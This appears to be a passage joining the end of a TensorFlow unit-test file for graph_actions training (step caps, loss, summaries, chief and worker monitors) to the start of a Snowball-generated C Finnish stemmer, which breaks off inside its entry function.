        train_op = state_ops.assign_add(variables_lib.get_global_step(), 1)
      learn.graph_actions.train(
          g,
          output_dir=self._output_dir,
          train_op=train_op,
          loss_op=constant_op.constant(2.0),
          max_steps=10)
      step = checkpoint_utils.load_variable(
          self._output_dir, variables_lib.get_global_step().name)
      self.assertEqual(10, step)

    # Second graph restores step 10 and only advances to the absolute cap.
    with ops.Graph().as_default() as g, self.test_session(g):
      with ops.control_dependencies(self._build_inference_graph()):
        train_op = state_ops.assign_add(variables_lib.get_global_step(), 1)
      learn.graph_actions.train(
          g,
          output_dir=self._output_dir,
          train_op=train_op,
          loss_op=constant_op.constant(2.0),
          max_steps=15)
      step = checkpoint_utils.load_variable(
          self._output_dir, variables_lib.get_global_step().name)
      self.assertEqual(15, step)
  def test_train_loss(self):
    """The returned loss reflects the value after the final step.

    The loss variable starts at 10.0 and each of the 6 steps subtracts
    1.0, so train() should report 4.0.
    """
    with ops.Graph().as_default() as g, self.test_session(g):
      variables_lib.create_global_step()
      loss_var = variables_lib.local_variable(10.0)
      # One group op: advance the global step and decay the loss together.
      train_op = control_flow_ops.group(
          state_ops.assign_add(variables_lib.get_global_step(), 1),
          state_ops.assign_add(loss_var, -1.0))
      self._assert_summaries(self._output_dir)
      self._assert_ckpt(self._output_dir, False)
      loss = learn.graph_actions.train(
          g,
          output_dir=self._output_dir,
          train_op=train_op,
          loss_op=loss_var.value(),
          steps=6)
      # TODO(ebrevdo,ptucker,ispir): this meta_graph_def lacks the
      # SaverDef, so we can't add it to the summary assertion test below.
      # meta_graph_def = meta_graph.create_meta_graph_def()
      self.assertEqual(4.0, loss)
      self._assert_summaries(self._output_dir, expected_graphs=[g])
      self._assert_ckpt(self._output_dir, True)
  def test_train_summaries(self):
    """A scalar summary attached to the loss is written for step 1."""
    with ops.Graph().as_default() as g, self.test_session(g):
      with ops.control_dependencies(self._build_inference_graph()):
        train_op = state_ops.assign_add(variables_lib.get_global_step(), 1)
      loss_op = constant_op.constant(2.0)
      summary.scalar('loss', loss_op)
      self._assert_summaries(self._output_dir)
      self._assert_ckpt(self._output_dir, False)
      loss = learn.graph_actions.train(
          g,
          output_dir=self._output_dir,
          train_op=train_op,
          loss_op=loss_op,
          steps=1)
      # TODO(ebrevdo,ptucker,ispir): this meta_graph_def lacks the
      # SaverDef, so we can't add it to the summary assertion test below.
      # meta_graph_def = meta_graph.create_meta_graph_def()
      self.assertEqual(2.0, loss)
      # Expect exactly one summary event: {step 1: loss == 2.0}.
      self._assert_summaries(
          self._output_dir,
          expected_graphs=[g],
          expected_summaries={1: {
              'loss': 2.0
          }})
      self._assert_ckpt(self._output_dir, True)
  def test_train_chief_monitor(self):
    """On a chief worker, both chief-only and all-worker monitors run."""
    with ops.Graph().as_default() as g, self.test_session(g):
      with ops.control_dependencies(self._build_inference_graph()):
        train_op = state_ops.assign_add(variables_lib.get_global_step(), 1)
      loss_op = constant_op.constant(2.0)
      summary.scalar('loss', loss_op)
      # Wrapper arg is run_on_all_workers: False => chief-exclusive.
      chief_exclusive_monitor = _BaseMonitorWrapper(False)
      all_workers_monitor = _BaseMonitorWrapper(True)
      loss = learn.graph_actions.train(
          g,
          output_dir=self._output_dir,
          train_op=train_op,
          loss_op=loss_op,
          supervisor_is_chief=True,
          steps=1,
          monitors=[chief_exclusive_monitor, all_workers_monitor])
      self.assertEqual(2.0, loss)
      self.assertTrue(chief_exclusive_monitor.is_active and
                      all_workers_monitor.is_active,
                      'All monitors must have been active.')
      self.assertTrue(chief_exclusive_monitor.has_step and
                      all_workers_monitor.has_step,
                      'All monitors must have a step.')
  def test_train_worker_monitor(self):
    """On a non-chief worker only the all-worker monitor should fire."""
    # We need to explicitly set device due to check on non-chief workers
    # requiring all variables to have a device assigned.
    with ops.Graph().as_default() as g, g.device('/cpu:0'):
      global_step = variables_lib.create_global_step(g)
      train_op = state_ops.assign_add(global_step, 1)
      loss_op = constant_op.constant(2.0)
      summary.scalar('loss', loss_op)
      # Add explicit "local" init op to initialize all variables
      # as there's no chief to init here.
      init_op = variables.global_variables_initializer()
      ops.add_to_collection(ops.GraphKeys.LOCAL_INIT_OP, init_op)
      # Create worker monitors where one should be active on the worker
      # and the other chief exclusive.
      chief_exclusive_monitor = _BaseMonitorWrapper(False)
      all_workers_monitor = _BaseMonitorWrapper(True)
      with self.test_session(g):
        loss = learn.graph_actions.train(
            g,
            output_dir=self._output_dir,
            global_step_tensor=global_step,
            train_op=train_op,
            loss_op=loss_op,
            supervisor_is_chief=False,
            steps=1,
            monitors=[chief_exclusive_monitor, all_workers_monitor])
      self.assertEqual(2.0, loss)
      self.assertTrue(not chief_exclusive_monitor.is_active and
                      all_workers_monitor.is_active,
                      'Only non-chief runnable monitor must have been active.')
      self.assertTrue(not chief_exclusive_monitor.has_step and
                      all_workers_monitor.has_step,
                      'Only non-chief runnable monitor must have a step.')
# Run the test suite when this file is executed directly.
if __name__ == '__main__':
  test.main()
/* Generated from finnish.sbl by Snowball 3.0.0 - https://snowballstem.org/ */
#include "stem_ISO_8859_1_finnish.h"
#include <stddef.h>
#include "snowball_runtime.h"
/* Per-call stemmer state.  The shared SN_env must remain the first member:
 * every routine below downcasts its SN_env* to SN_local* to reach the
 * Finnish-specific fields. */
struct SN_local {
    struct SN_env z;
    int i_p2;                       /* right region boundary set by r_mark_regions */
    int i_p1;                       /* left region boundary set by r_mark_regions */
    unsigned char b_ending_removed; /* flag: r_case_ending deleted something */
    symbol * s_x;                   /* scratch slice buffer used by r_tidy */
};
typedef struct SN_local SN_local;
#ifdef __cplusplus
extern "C" {
#endif
extern int finnish_ISO_8859_1_stem(struct SN_env * z);
#ifdef __cplusplus
}
#endif
/* Forward declarations for the stemming rules, one per Snowball routine. */
static int r_tidy(struct SN_env * z);
static int r_other_endings(struct SN_env * z);
static int r_t_plural(struct SN_env * z);
static int r_i_plural(struct SN_env * z);
static int r_case_ending(struct SN_env * z);
static int r_VI(struct SN_env * z);
static int r_LONG(struct SN_env * z);
static int r_possessive(struct SN_env * z);
static int r_particle_etc(struct SN_env * z);
static int r_R2(struct SN_env * z);
static int r_mark_regions(struct SN_env * z);
/* Literal strings used by eq_s_b / slice_from_s below.  0xE4 and 0xF6 are
 * ISO-8859-1 a-umlaut and o-umlaut. */
static const symbol s_0[] = { 'k', 's', 'e' };
static const symbol s_1[] = { 'k', 's', 'i' };
static const symbol s_2[] = { 'i', 'e' };
static const symbol s_3[] = { 'p', 'o' };
static const symbol s_4[] = { 'p', 'o' };
/* "Among" tables: suffix strings plus rows of
 * { length, text, link-to-shorter-entry, result code, function index };
 * consumed by find_among_b (see the snowball runtime header for the exact
 * struct among layout). */
static const symbol s_0_0[2] = { 'p', 'a' };
static const symbol s_0_1[3] = { 's', 't', 'i' };
static const symbol s_0_2[4] = { 'k', 'a', 'a', 'n' };
static const symbol s_0_3[3] = { 'h', 'a', 'n' };
static const symbol s_0_4[3] = { 'k', 'i', 'n' };
static const symbol s_0_5[3] = { 'h', 0xE4, 'n' };
static const symbol s_0_6[4] = { 'k', 0xE4, 0xE4, 'n' };
static const symbol s_0_7[2] = { 'k', 'o' };
static const symbol s_0_8[2] = { 'p', 0xE4 };
static const symbol s_0_9[2] = { 'k', 0xF6 };
/* a_0: particle endings, used by r_particle_etc. */
static const struct among a_0[10] = {
{ 2, s_0_0, 0, 1, 0},
{ 3, s_0_1, 0, 2, 0},
{ 4, s_0_2, 0, 1, 0},
{ 3, s_0_3, 0, 1, 0},
{ 3, s_0_4, 0, 1, 0},
{ 3, s_0_5, 0, 1, 0},
{ 4, s_0_6, 0, 1, 0},
{ 2, s_0_7, 0, 1, 0},
{ 2, s_0_8, 0, 1, 0},
{ 2, s_0_9, 0, 1, 0}
};
static const symbol s_1_0[3] = { 'l', 'l', 'a' };
static const symbol s_1_1[2] = { 'n', 'a' };
static const symbol s_1_2[3] = { 's', 's', 'a' };
static const symbol s_1_3[2] = { 't', 'a' };
static const symbol s_1_4[3] = { 'l', 't', 'a' };
static const symbol s_1_5[3] = { 's', 't', 'a' };
/* a_1: back-vowel case endings checked inside r_possessive (case 4). */
static const struct among a_1[6] = {
{ 3, s_1_0, 0, -1, 0},
{ 2, s_1_1, 0, -1, 0},
{ 3, s_1_2, 0, -1, 0},
{ 2, s_1_3, 0, -1, 0},
{ 3, s_1_4, -1, -1, 0},
{ 3, s_1_5, -2, -1, 0}
};
static const symbol s_2_0[3] = { 'l', 'l', 0xE4 };
static const symbol s_2_1[2] = { 'n', 0xE4 };
static const symbol s_2_2[3] = { 's', 's', 0xE4 };
static const symbol s_2_3[2] = { 't', 0xE4 };
static const symbol s_2_4[3] = { 'l', 't', 0xE4 };
static const symbol s_2_5[3] = { 's', 't', 0xE4 };
/* a_2: front-vowel variants of a_1, r_possessive (case 5). */
static const struct among a_2[6] = {
{ 3, s_2_0, 0, -1, 0},
{ 2, s_2_1, 0, -1, 0},
{ 3, s_2_2, 0, -1, 0},
{ 2, s_2_3, 0, -1, 0},
{ 3, s_2_4, -1, -1, 0},
{ 3, s_2_5, -2, -1, 0}
};
static const symbol s_3_0[3] = { 'l', 'l', 'e' };
static const symbol s_3_1[3] = { 'i', 'n', 'e' };
/* a_3: endings checked inside r_possessive (case 6). */
static const struct among a_3[2] = {
{ 3, s_3_0, 0, -1, 0},
{ 3, s_3_1, 0, -1, 0}
};
static const symbol s_4_0[3] = { 'n', 's', 'a' };
static const symbol s_4_1[3] = { 'm', 'm', 'e' };
static const symbol s_4_2[3] = { 'n', 'n', 'e' };
static const symbol s_4_3[2] = { 'n', 'i' };
static const symbol s_4_4[2] = { 's', 'i' };
static const symbol s_4_5[2] = { 'a', 'n' };
static const symbol s_4_6[2] = { 'e', 'n' };
static const symbol s_4_7[2] = { 0xE4, 'n' };
static const symbol s_4_8[3] = { 'n', 's', 0xE4 };
/* a_4: possessive suffixes, dispatched on by r_possessive. */
static const struct among a_4[9] = {
{ 3, s_4_0, 0, 3, 0},
{ 3, s_4_1, 0, 3, 0},
{ 3, s_4_2, 0, 3, 0},
{ 2, s_4_3, 0, 2, 0},
{ 2, s_4_4, 0, 1, 0},
{ 2, s_4_5, 0, 4, 0},
{ 2, s_4_6, 0, 6, 0},
{ 2, s_4_7, 0, 5, 0},
{ 3, s_4_8, 0, 3, 0}
};
static const symbol s_5_0[2] = { 'a', 'a' };
static const symbol s_5_1[2] = { 'e', 'e' };
static const symbol s_5_2[2] = { 'i', 'i' };
static const symbol s_5_3[2] = { 'o', 'o' };
static const symbol s_5_4[2] = { 'u', 'u' };
static const symbol s_5_5[2] = { 0xE4, 0xE4 };
static const symbol s_5_6[2] = { 0xF6, 0xF6 };
/* a_5: doubled (long) vowels, matched by r_LONG. */
static const struct among a_5[7] = {
{ 2, s_5_0, 0, -1, 0},
{ 2, s_5_1, 0, -1, 0},
{ 2, s_5_2, 0, -1, 0},
{ 2, s_5_3, 0, -1, 0},
{ 2, s_5_4, 0, -1, 0},
{ 2, s_5_5, 0, -1, 0},
{ 2, s_5_6, 0, -1, 0}
};
static const symbol s_6_0[1] = { 'a' };
static const symbol s_6_1[3] = { 'l', 'l', 'a' };
static const symbol s_6_2[2] = { 'n', 'a' };
static const symbol s_6_3[3] = { 's', 's', 'a' };
static const symbol s_6_4[2] = { 't', 'a' };
static const symbol s_6_5[3] = { 'l', 't', 'a' };
static const symbol s_6_6[3] = { 's', 't', 'a' };
static const symbol s_6_7[3] = { 't', 't', 'a' };
static const symbol s_6_8[3] = { 'l', 'l', 'e' };
static const symbol s_6_9[3] = { 'i', 'n', 'e' };
static const symbol s_6_10[3] = { 'k', 's', 'i' };
static const symbol s_6_11[1] = { 'n' };
static const symbol s_6_12[3] = { 'h', 'a', 'n' };
static const symbol s_6_13[3] = { 'd', 'e', 'n' };
static const symbol s_6_14[4] = { 's', 'e', 'e', 'n' };
static const symbol s_6_15[3] = { 'h', 'e', 'n' };
static const symbol s_6_16[4] = { 't', 't', 'e', 'n' };
static const symbol s_6_17[3] = { 'h', 'i', 'n' };
static const symbol s_6_18[4] = { 's', 'i', 'i', 'n' };
static const symbol s_6_19[3] = { 'h', 'o', 'n' };
static const symbol s_6_20[3] = { 'h', 0xE4, 'n' };
static const symbol s_6_21[3] = { 'h', 0xF6, 'n' };
static const symbol s_6_22[1] = { 0xE4 };
static const symbol s_6_23[3] = { 'l', 'l', 0xE4 };
static const symbol s_6_24[2] = { 'n', 0xE4 };
static const symbol s_6_25[3] = { 's', 's', 0xE4 };
static const symbol s_6_26[2] = { 't', 0xE4 };
static const symbol s_6_27[3] = { 'l', 't', 0xE4 };
static const symbol s_6_28[3] = { 's', 't', 0xE4 };
static const symbol s_6_29[3] = { 't', 't', 0xE4 };
/* a_6: case endings for r_case_ending; nonzero trailing field selects a
 * callback in af_6 (1 -> r_VI, 2 -> r_LONG). */
static const struct among a_6[30] = {
{ 1, s_6_0, 0, 8, 0},
{ 3, s_6_1, -1, -1, 0},
{ 2, s_6_2, -2, -1, 0},
{ 3, s_6_3, -3, -1, 0},
{ 2, s_6_4, -4, -1, 0},
{ 3, s_6_5, -1, -1, 0},
{ 3, s_6_6, -2, -1, 0},
{ 3, s_6_7, -3, 2, 0},
{ 3, s_6_8, 0, -1, 0},
{ 3, s_6_9, 0, -1, 0},
{ 3, s_6_10, 0, -1, 0},
{ 1, s_6_11, 0, 7, 0},
{ 3, s_6_12, -1, 1, 0},
{ 3, s_6_13, -2, -1, 1},
{ 4, s_6_14, -3, -1, 2},
{ 3, s_6_15, -4, 2, 0},
{ 4, s_6_16, -5, -1, 1},
{ 3, s_6_17, -6, 3, 0},
{ 4, s_6_18, -7, -1, 1},
{ 3, s_6_19, -8, 4, 0},
{ 3, s_6_20, -9, 5, 0},
{ 3, s_6_21, -10, 6, 0},
{ 1, s_6_22, 0, 8, 0},
{ 3, s_6_23, -1, -1, 0},
{ 2, s_6_24, -2, -1, 0},
{ 3, s_6_25, -3, -1, 0},
{ 2, s_6_26, -4, -1, 0},
{ 3, s_6_27, -1, -1, 0},
{ 3, s_6_28, -2, -1, 0},
{ 3, s_6_29, -3, 2, 0}
};
/* Dispatch the per-entry callback requested by table a_6 (field z->af):
 * 1 -> r_VI, 2 -> r_LONG.  Returns -1 for an unknown index. */
static int af_6(struct SN_env * z) {
    switch (z->af) {
        case 1: return r_VI(z);
        case 2: return r_LONG(z);
    }
    return -1;
}
static const symbol s_7_0[3] = { 'e', 'j', 'a' };
static const symbol s_7_1[3] = { 'm', 'm', 'a' };
static const symbol s_7_2[4] = { 'i', 'm', 'm', 'a' };
static const symbol s_7_3[3] = { 'm', 'p', 'a' };
static const symbol s_7_4[4] = { 'i', 'm', 'p', 'a' };
static const symbol s_7_5[3] = { 'm', 'm', 'i' };
static const symbol s_7_6[4] = { 'i', 'm', 'm', 'i' };
static const symbol s_7_7[3] = { 'm', 'p', 'i' };
static const symbol s_7_8[4] = { 'i', 'm', 'p', 'i' };
static const symbol s_7_9[3] = { 'e', 'j', 0xE4 };
static const symbol s_7_10[3] = { 'm', 'm', 0xE4 };
static const symbol s_7_11[4] = { 'i', 'm', 'm', 0xE4 };
static const symbol s_7_12[3] = { 'm', 'p', 0xE4 };
static const symbol s_7_13[4] = { 'i', 'm', 'p', 0xE4 };
/* a_7: comparative/other endings used by r_other_endings. */
static const struct among a_7[14] = {
{ 3, s_7_0, 0, -1, 0},
{ 3, s_7_1, 0, 1, 0},
{ 4, s_7_2, -1, -1, 0},
{ 3, s_7_3, 0, 1, 0},
{ 4, s_7_4, -1, -1, 0},
{ 3, s_7_5, 0, 1, 0},
{ 4, s_7_6, -1, -1, 0},
{ 3, s_7_7, 0, 1, 0},
{ 4, s_7_8, -1, -1, 0},
{ 3, s_7_9, 0, -1, 0},
{ 3, s_7_10, 0, 1, 0},
{ 4, s_7_11, -1, -1, 0},
{ 3, s_7_12, 0, 1, 0},
{ 4, s_7_13, -1, -1, 0}
};
static const symbol s_9_0[3] = { 'm', 'm', 'a' };
static const symbol s_9_1[4] = { 'i', 'm', 'm', 'a' };
/* a_9: endings checked in the second half of r_t_plural. */
static const struct among a_9[2] = {
{ 3, s_9_0, 0, 1, 0},
{ 4, s_9_1, -1, -1, 0}
};
/* Character-class bitmaps for in_grouping/out_grouping (ISO-8859-1):
 * g_AEI / g_C / g_V1 / g_V2 / g_particle_end.  Each byte is a bitmask over
 * a range of character codes; see the grouping helpers in the runtime. */
static const unsigned char g_AEI[] = { 17, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 8 };
static const unsigned char g_C[] = { 119, 223, 119, 1 };
static const unsigned char g_V1[] = { 17, 65, 16, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 8, 0, 32 };
static const unsigned char g_V2[] = { 17, 65, 16, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 8, 0, 32 };
static const unsigned char g_particle_end[] = { 17, 97, 24, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 8, 0, 32 };
/* Set i_p1 and i_p2: the cursor positions reached after skipping, twice in a
 * row, a run of non-V1 characters followed by a run of V1 characters.  Both
 * default to the end of the word if a run is not found.  The later ending
 * rules only fire at or beyond these positions. */
static int r_mark_regions(struct SN_env * z) {
    ((SN_local *)z)->i_p1 = z->l;
    ((SN_local *)z)->i_p2 = z->l;
    {
        int ret = out_grouping(z, g_V1, 97, 246, 1);
        if (ret < 0) return 0;
        z->c += ret;
    }
    {
        int ret = in_grouping(z, g_V1, 97, 246, 1);
        if (ret < 0) return 0;
        z->c += ret;
    }
    ((SN_local *)z)->i_p1 = z->c;  /* end of first vowel/non-vowel cycle */
    {
        int ret = out_grouping(z, g_V1, 97, 246, 1);
        if (ret < 0) return 0;
        z->c += ret;
    }
    {
        int ret = in_grouping(z, g_V1, 97, 246, 1);
        if (ret < 0) return 0;
        z->c += ret;
    }
    ((SN_local *)z)->i_p2 = z->c;  /* end of second cycle */
    return 1;
}
/* True iff the cursor lies at or beyond the p2 boundary. */
static int r_R2(struct SN_env * z) {
    return ((SN_local *)z)->i_p2 <= z->c;
}
/* Remove a particle ending (table a_0) found backwards from the cursor,
 * but no further left than i_p1.  Result 1 additionally requires the
 * preceding character to be in g_particle_end; result 2 requires R2. */
static int r_particle_etc(struct SN_env * z) {
    int among_var;
    {
        int v_1;
        if (z->c < ((SN_local *)z)->i_p1) return 0;
        /* Temporarily raise the left bound to i_p1 for the match. */
        v_1 = z->lb; z->lb = ((SN_local *)z)->i_p1;
        z->ket = z->c;
        among_var = find_among_b(z, a_0, 10, 0);
        if (!among_var) { z->lb = v_1; return 0; }
        z->bra = z->c;
        z->lb = v_1;
    }
    switch (among_var) {
        case 1:
            if (in_grouping_b(z, g_particle_end, 97, 246, 0)) return 0;
            break;
        case 2:
            {
                int ret = r_R2(z);
                if (ret <= 0) return ret;
            }
            break;
    }
    {
        int ret = slice_del(z);
        if (ret < 0) return ret;
    }
    return 1;
}
/* Remove a possessive suffix (table a_4), restricted to the i_p1 region.
 * Case 1 refuses when preceded by 'k'; case 2 deletes and then maps a
 * remaining "kse" to "ksi"; cases 4-6 only delete when the shortened word
 * still ends in a matching case ending (tables a_1/a_2/a_3). */
static int r_possessive(struct SN_env * z) {
    int among_var;
    {
        int v_1;
        if (z->c < ((SN_local *)z)->i_p1) return 0;
        v_1 = z->lb; z->lb = ((SN_local *)z)->i_p1;
        z->ket = z->c;
        among_var = find_among_b(z, a_4, 9, 0);
        if (!among_var) { z->lb = v_1; return 0; }
        z->bra = z->c;
        z->lb = v_1;
    }
    switch (among_var) {
        case 1:
            {
                /* not 'k' immediately before the suffix */
                int v_2 = z->l - z->c;
                if (z->c <= z->lb || z->p[z->c - 1] != 'k') goto lab0;
                z->c--;
                return 0;
            lab0:
                z->c = z->l - v_2;
            }
            {
                int ret = slice_del(z);
                if (ret < 0) return ret;
            }
            break;
        case 2:
            {
                int ret = slice_del(z);
                if (ret < 0) return ret;
            }
            /* "kse" left behind becomes "ksi" */
            z->ket = z->c;
            if (!(eq_s_b(z, 3, s_0))) return 0;
            z->bra = z->c;
            {
                int ret = slice_from_s(z, 3, s_1);
                if (ret < 0) return ret;
            }
            break;
        case 3:
            {
                int ret = slice_del(z);
                if (ret < 0) return ret;
            }
            break;
        case 4:
            /* quick reject: last char must be 'a' (97) before probing a_1 */
            if (z->c - 1 <= z->lb || z->p[z->c - 1] != 97) return 0;
            if (!find_among_b(z, a_1, 6, 0)) return 0;
            {
                int ret = slice_del(z);
                if (ret < 0) return ret;
            }
            break;
        case 5:
            /* quick reject: last char must be 0xE4 (228) before probing a_2 */
            if (z->c - 1 <= z->lb || z->p[z->c - 1] != 228) return 0;
            if (!find_among_b(z, a_2, 6, 0)) return 0;
            {
                int ret = slice_del(z);
                if (ret < 0) return ret;
            }
            break;
        case 6:
            /* quick reject: last char must be 'e' (101) before probing a_3 */
            if (z->c - 2 <= z->lb || z->p[z->c - 1] != 101) return 0;
            if (!find_among_b(z, a_3, 2, 0)) return 0;
            {
                int ret = slice_del(z);
                if (ret < 0) return ret;
            }
            break;
    }
    return 1;
}
/* True iff a doubled vowel (table a_5) ends at the cursor. */
static int r_LONG(struct SN_env * z) {
    return find_among_b(z, a_5, 7, 0) != 0;
}
/* Consume a trailing 'i' and succeed iff it is preceded by a V2 vowel. */
static int r_VI(struct SN_env * z) {
    if (z->c <= z->lb || z->p[z->c - 1] != 'i') return 0;
    z->c--;
    return !in_grouping_b(z, g_V2, 97, 246, 0);
}
/* Remove a case ending (table a_6, with af_6 callbacks), restricted to the
 * i_p1 region.  Cases 1-6 require a specific repeated final vowel; case 7
 * optionally extends the deletion left over a long vowel or "ie"; case 8
 * requires vowel + consonant before the ending.  Sets b_ending_removed on
 * success. */
static int r_case_ending(struct SN_env * z) {
    int among_var;
    {
        int v_1;
        if (z->c < ((SN_local *)z)->i_p1) return 0;
        v_1 = z->lb; z->lb = ((SN_local *)z)->i_p1;
        z->ket = z->c;
        among_var = find_among_b(z, a_6, 30, af_6);
        if (!among_var) { z->lb = v_1; return 0; }
        z->bra = z->c;
        z->lb = v_1;
    }
    switch (among_var) {
        case 1:
            if (z->c <= z->lb || z->p[z->c - 1] != 'a') return 0;
            z->c--;
            break;
        case 2:
            if (z->c <= z->lb || z->p[z->c - 1] != 'e') return 0;
            z->c--;
            break;
        case 3:
            if (z->c <= z->lb || z->p[z->c - 1] != 'i') return 0;
            z->c--;
            break;
        case 4:
            if (z->c <= z->lb || z->p[z->c - 1] != 'o') return 0;
            z->c--;
            break;
        case 5:
            if (z->c <= z->lb || z->p[z->c - 1] != 0xE4) return 0;
            z->c--;
            break;
        case 6:
            if (z->c <= z->lb || z->p[z->c - 1] != 0xF6) return 0;
            z->c--;
            break;
        case 7:
            /* optionally widen the slice left over LONG or "ie" + one char */
            {
                int v_2 = z->l - z->c;
                {
                    int v_3 = z->l - z->c;
                    do {
                        int v_4 = z->l - z->c;
                        {
                            int ret = r_LONG(z);
                            if (ret == 0) goto lab1;
                            if (ret < 0) return ret;
                        }
                        break;
                    lab1:
                        z->c = z->l - v_4;
                        if (!(eq_s_b(z, 2, s_2))) { z->c = z->l - v_2; goto lab0; }
                    } while (0);
                    z->c = z->l - v_3;
                    if (z->c <= z->lb) { z->c = z->l - v_2; goto lab0; }
                    z->c--;
                }
                z->bra = z->c;
            lab0:
                ;
            }
            break;
        case 8:
            if (in_grouping_b(z, g_V1, 97, 246, 0)) return 0;
            if (in_grouping_b(z, g_C, 98, 122, 0)) return 0;
            break;
    }
    {
        int ret = slice_del(z);
        if (ret < 0) return ret;
    }
    ((SN_local *)z)->b_ending_removed = 1;
    return 1;
}
/* Remove a comparative/other ending (table a_7), restricted to the i_p2
 * region.  Case 1 refuses when the ending is preceded by "po". */
static int r_other_endings(struct SN_env * z) {
    int among_var;
    {
        int v_1;
        if (z->c < ((SN_local *)z)->i_p2) return 0;
        v_1 = z->lb; z->lb = ((SN_local *)z)->i_p2;
        z->ket = z->c;
        among_var = find_among_b(z, a_7, 14, 0);
        if (!among_var) { z->lb = v_1; return 0; }
        z->bra = z->c;
        z->lb = v_1;
    }
    switch (among_var) {
        case 1:
            {
                int v_2 = z->l - z->c;
                if (!(eq_s_b(z, 2, s_3))) goto lab0;
                return 0;
            lab0:
                z->c = z->l - v_2;
            }
            break;
    }
    {
        int ret = slice_del(z);
        if (ret < 0) return ret;
    }
    return 1;
}
/* Remove a plural marker 'i' (105) or 'j' (106) within the i_p1 region. */
static int r_i_plural(struct SN_env * z) {
    {
        int v_1;
        if (z->c < ((SN_local *)z)->i_p1) return 0;
        v_1 = z->lb; z->lb = ((SN_local *)z)->i_p1;
        z->ket = z->c;
        if (z->c <= z->lb || (z->p[z->c - 1] != 105 && z->p[z->c - 1] != 106)) { z->lb = v_1; return 0; }
        z->c--;
        z->bra = z->c;
        z->lb = v_1;
    }
    {
        int ret = slice_del(z);
        if (ret < 0) return ret;
    }
    return 1;
}
/* Remove a plural 't' (preceded by a V1 vowel, within i_p1), then remove a
 * following "mma"/"imma" ending within i_p2 — except "mma" preceded by
 * "po", which is kept. */
static int r_t_plural(struct SN_env * z) {
    int among_var;
    {
        int v_1;
        if (z->c < ((SN_local *)z)->i_p1) return 0;
        v_1 = z->lb; z->lb = ((SN_local *)z)->i_p1;
        z->ket = z->c;
        if (z->c <= z->lb || z->p[z->c - 1] != 't') { z->lb = v_1; return 0; }
        z->c--;
        z->bra = z->c;
        {
            /* test (without moving the cursor) that a vowel precedes */
            int v_2 = z->l - z->c;
            if (in_grouping_b(z, g_V1, 97, 246, 0)) { z->lb = v_1; return 0; }
            z->c = z->l - v_2;
        }
        {
            int ret = slice_del(z);
            if (ret < 0) return ret;
        }
        z->lb = v_1;
    }
    {
        int v_3;
        if (z->c < ((SN_local *)z)->i_p2) return 0;
        v_3 = z->lb; z->lb = ((SN_local *)z)->i_p2;
        z->ket = z->c;
        /* quick reject: last char must be 'a' (97) before probing a_9 */
        if (z->c - 2 <= z->lb || z->p[z->c - 1] != 97) { z->lb = v_3; return 0; }
        among_var = find_among_b(z, a_9, 2, 0);
        if (!among_var) { z->lb = v_3; return 0; }
        z->bra = z->c;
        z->lb = v_3;
    }
    switch (among_var) {
        case 1:
            {
                int v_4 = z->l - z->c;
                if (!(eq_s_b(z, 2, s_4))) goto lab0;
                return 0;
            lab0:
                z->c = z->l - v_4;
            }
            break;
    }
    {
        int ret = slice_del(z);
        if (ret < 0) return ret;
    }
    return 1;
}
/* Final cleanup within the i_p1 region: shorten a trailing long vowel,
 * delete an AEI vowel after a consonant, drop 'j' after 'o'/'u' and 'o'
 * after 'j', then undouble a final consonant (delete one of two equal
 * consonants following a vowel, via the s_x scratch slice). */
static int r_tidy(struct SN_env * z) {
    {
        int v_1;
        if (z->c < ((SN_local *)z)->i_p1) return 0;
        v_1 = z->lb; z->lb = ((SN_local *)z)->i_p1;
        {
            /* attempt: if LONG matches here, delete one character of it */
            int v_2 = z->l - z->c;
            {
                int v_3 = z->l - z->c;
                {
                    int ret = r_LONG(z);
                    if (ret == 0) goto lab0;
                    if (ret < 0) return ret;
                }
                z->c = z->l - v_3;
                z->ket = z->c;
                if (z->c <= z->lb) goto lab0;
                z->c--;
                z->bra = z->c;
                {
                    int ret = slice_del(z);
                    if (ret < 0) return ret;
                }
            }
        lab0:
            z->c = z->l - v_2;
        }
        {
            /* attempt: delete an AEI vowel preceded by a consonant */
            int v_4 = z->l - z->c;
            z->ket = z->c;
            if (in_grouping_b(z, g_AEI, 97, 228, 0)) goto lab1;
            z->bra = z->c;
            if (in_grouping_b(z, g_C, 98, 122, 0)) goto lab1;
            {
                int ret = slice_del(z);
                if (ret < 0) return ret;
            }
        lab1:
            z->c = z->l - v_4;
        }
        {
            /* attempt: delete 'j' after 'o' or 'u' */
            int v_5 = z->l - z->c;
            z->ket = z->c;
            if (z->c <= z->lb || z->p[z->c - 1] != 'j') goto lab2;
            z->c--;
            z->bra = z->c;
            do {
                int v_6 = z->l - z->c;
                if (z->c <= z->lb || z->p[z->c - 1] != 'o') goto lab3;
                z->c--;
                break;
            lab3:
                z->c = z->l - v_6;
                if (z->c <= z->lb || z->p[z->c - 1] != 'u') goto lab2;
                z->c--;
            } while (0);
            {
                int ret = slice_del(z);
                if (ret < 0) return ret;
            }
        lab2:
            z->c = z->l - v_5;
        }
        {
            /* attempt: delete 'o' after 'j' */
            int v_7 = z->l - z->c;
            z->ket = z->c;
            if (z->c <= z->lb || z->p[z->c - 1] != 'o') goto lab4;
            z->c--;
            z->bra = z->c;
            if (z->c <= z->lb || z->p[z->c - 1] != 'j') goto lab4;
            z->c--;
            {
                int ret = slice_del(z);
                if (ret < 0) return ret;
            }
        lab4:
            z->c = z->l - v_7;
        }
        z->lb = v_1;
    }
    /* undouble final consonant: capture one consonant into s_x and delete
     * the identical consonant before it */
    if (in_grouping_b(z, g_V1, 97, 246, 1) < 0) return 0;
    z->ket = z->c;
    if (in_grouping_b(z, g_C, 98, 122, 0)) return 0;
    z->bra = z->c;
    {
        int ret = slice_to(z, &((SN_local *)z)->s_x);
        if (ret < 0) return ret;
    }
    if (!(eq_v_b(z, ((SN_local *)z)->s_x))) return 0;
    {
        int ret = slice_del(z);
        if (ret < 0) return ret;
    }
    return 1;
}
/* Entry point: stem the word in z.  Marks regions, then runs the ending
 * rules right-to-left (each attempted and unwound on failure): particles,
 * possessives, case endings, other endings; then i-plural if a case ending
 * was removed, otherwise t-plural; finally tidy-up.  Always returns 1
 * unless a rule reports a hard error (< 0). */
extern int finnish_ISO_8859_1_stem(struct SN_env * z) {
    {
        int v_1 = z->c;
        {
            int ret = r_mark_regions(z);
            if (ret < 0) return ret;
        }
        z->c = v_1;
    }
